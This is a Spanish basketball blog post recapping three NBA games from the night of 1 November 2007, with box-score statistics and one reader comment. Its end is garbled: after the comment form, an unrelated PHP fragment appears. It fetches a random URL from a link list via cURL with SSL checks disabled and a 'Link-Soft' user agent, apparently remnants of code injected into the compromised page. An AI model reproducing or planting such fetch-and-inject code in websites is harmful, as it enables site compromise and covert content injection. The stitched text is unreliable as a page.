La crónica (noche del 01/11/07)

02 de November de 2007 por MagicJohnson32

tmactiraTres partidos y tres victorias visitantes en la pasada madrugada. Los Pistons se dejaron guiar por Prince en el American Airlines Arena de Miami; los Rockets ganaron en Salt Lake City con exhibición anotadora de McGrady ; y los Suns vencieron en el Key Arena con un gran Amaré y pese a las buenas actuaciones de Wilcox y Durant.

Consulta la crónica y los box-scores de estos tres partidos.

Pistons 91 – Heat 80priiiice

Ha hecho falta la baja de Hamilton para que Prince saque toda su clase. Ante la ausencia de RIP, el alero de los Pistons logró la máxima anotación de su carrera, 34 puntos (13 de 23 en tiros de campo, 7 de 7 en libres) e igualó su mejor marca reboteadora (12), de forma que los de Michigan se anotaron este primer clásico del Este de la temporada. Algo falló en los Heat, en los que no jugó Wade, cuando Shaq se quedó en sólo 9 puntos y 6 lanzamientos intentados, y The Big Fella se encargó de dejarlo claro en sus declaraciones post-partido al acusar a su equipo de abusar del lanzamiento exterior. A Haslem no pareció afectarle y cosechó 14 puntos y 10 rebotes para ser el mejor de los de Florida junto a Ricky Davis, que se estrenó con su nuevo equipo con 23 puntos. Jason Williams rondó el triple-doble (11-7-9), mientras que en los Pistons también destacaron Billups (19-11), Rasheed (11-8) y Hayes (10-5-4). El rookie Affalo fue titular en el lugar de Hamilton pero se quedó en tres puntos en 14 minutos.

tmacnoRockets 106 – Jazz 95

47 puntos de McGrady, con 17 de 27 en tiros de campo y 11 de 14 en libres, han derrumbado esta pasada noche a los Jazz en su propia cancha. T-Mac, que esta vez tuvo como principal escudero a Mike James (15 puntos, 7 asistencias desde el banquillo), añadió 4 rebotes y 4 asistencias a su actuación para compensar la floja noche de Yao, que se quedó en 11-7-5 por problemas de faltas. Scola sumó 7 puntos y 9 rebotes y fue el hombre de rotación que más minutos estuvo sobre la cancha. Para los de Sloan no fue suficiente con los 30 puntos y 16 rebotes de Boozer, los 16-10 de Okur y los 18 puntos y 13 asistencias de Deron. La diferencia de banquillos (30 puntos del de Rockets por 13 del de Jazz) resultó decisiva y los texanos se tomaron una pequeña venganza por su eliminación en primera ronda de los pasados Playoffs.

Suns 106 – Sonics 99

Un parcial 27-17 en el último cuarto permitió a los Suns anotarse la victoria en su primer partido de la temporada 2007-2008 ante unos Sonics que ya suman dos derrotas. Y ello, pese a que Wilcox calcó las estadísticas de Amaré, 23 puntos y 11 rebotes, y Durant estuvo algo más efectivo que en su debut con 11 de 23 en tiros para 27 puntos. Sin embargo por los Sonics sólo Wilkins acompañó con 12-8-4, mientras que en los Suns Nash y Marion firmaron sendos doble-doble, Hill aportó 13-6-5 y Banks ejerció de Barbosa con 12 puntos en 14 minutos.

Comenta

Un comentario a esta entrada

  1. Jose_Dantley dice:
    #1

    Vaya como ha empezado McGrady, ¿será este su año?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>